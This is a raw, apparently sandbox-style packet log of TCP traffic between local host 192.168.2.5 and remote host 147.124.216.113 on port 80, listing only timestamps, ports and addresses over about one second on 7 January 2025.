Jan 7, 2025 13:25:00.882885933 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882908106 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882920027 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882930994 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882942915 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882987976 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882987976 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.883744955 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883781910 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883794069 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883836031 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.883836031 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.883872032 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883883953 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883896112 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883908033 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.883934021 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.883971930 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.884732008 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.884744883 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.884756088 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.884788990 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.924731016 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.924750090 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.924843073 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.924896002 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.924909115 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.924963951 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.930867910 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.930888891 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.930906057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.930938005 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.930958986 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.930970907 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.930980921 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.931029081 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.931029081 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.931358099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931370020 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931380987 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931430101 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.931571007 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931591034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931603909 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931615114 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.931672096 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932070017 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932082891 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932096958 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932109118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932126045 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932151079 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932166100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932168961 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932168961 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932179928 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932194948 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932224035 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932224035 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932248116 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932929039 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932940006 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932950974 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932982922 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.932993889 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.932993889 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.933007956 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.933043957 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.933051109 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.933053970 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.933063030 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.935230970 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971110106 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971133947 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971146107 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971157074 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971169949 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971194029 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971242905 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971280098 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971293926 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971326113 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971334934 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971347094 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971359015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971374035 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971395969 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971395969 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971416950 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971427917 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971440077 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971462011 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971474886 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.971525908 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971525908 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.971525908 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.972234011 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972245932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972265005 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972322941 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972335100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972336054 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.972359896 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972381115 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972398996 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972409964 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972415924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972421885 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.972421885 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.972527027 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.972527027 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.973102093 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973143101 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973155022 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973216057 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.973227024 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973238945 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973252058 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973282099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973301888 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973313093 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973326921 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973340034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.973357916 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.973357916 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.973357916 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.973404884 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.974024057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974065065 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974083900 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974103928 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974108934 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.974158049 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.974168062 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974184036 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974194050 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974205017 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.974256992 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.974256992 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.013608932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.013628960 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.013641119 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.013653040 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.013664961 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.013678074 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.013711929 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.013787985 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.019659996 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.019690990 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.019702911 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.019712925 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.019722939 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.019759893 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.019819975 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.127580881 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127594948 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127614021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127625942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127671957 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.127676010 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127691984 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127692938 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.127705097 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127723932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127742052 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.127784014 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.127785921 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127799034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127810955 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127846956 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.127948046 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127959967 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127969980 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.127981901 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128000975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128014088 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128021002 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128021002 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128026009 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128041029 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128052950 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128066063 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128088951 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128093958 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128104925 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128117085 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128122091 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128144979 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128144979 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128171921 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128185034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128196955 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128211021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128222942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128225088 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128262043 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128293991 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128317118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128331900 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128343105 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128381014 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128401995 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128556967 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128570080 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128582001 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128595114 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128608942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128618956 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128644943 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128650904 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128659010 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128670931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128684998 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128704071 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128711939 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128711939 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128720045 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128735065 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128748894 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128761053 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128767967 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128767967 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128774881 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128787994 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128803015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128804922 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128813982 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128827095 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128840923 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128844976 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128854036 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128869057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128881931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128881931 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128896952 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128901958 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128915071 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.128952980 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.128952980 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189019918 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189054012 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189071894 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189084053 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189099073 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189110041 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189115047 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189126015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189143896 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189143896 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189198971 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189210892 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189220905 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189240932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189244986 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189254045 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189284086 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189302921 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189337969 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189351082 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189363003 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189374924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189416885 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189443111 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189510107 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189521074 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189532995 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189605951 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189614058 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189626932 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189637899 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189650059 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189686060 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189698935 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189698935 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189712048 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189724922 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189737082 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189757109 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189774990 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189785004 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189786911 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189801931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189816952 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189821959 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189831972 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.189872026 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.189894915 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190538883 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190551043 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190562963 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190573931 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190587044 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190596104 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190599918 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190617085 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190624952 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190669060 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190700054 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190711975 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190722942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190733910 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190747976 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190753937 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190762043 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190774918 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190776110 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190788984 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190795898 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190804005 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.190815926 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.190905094 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.191440105 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.191452980 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.191488981 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224687099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224701881 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224714041 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224725008 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224739075 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224750996 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224756002 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224764109 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224806070 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224807978 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224821091 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224824905 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224836111 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224849939 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224862099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224869013 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224877119 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224890947 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224901915 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224912882 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224915028 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224924088 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224948883 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.224967003 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224981070 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.224983931 CET	49710	80	192.168.2.5	147.124.216.113
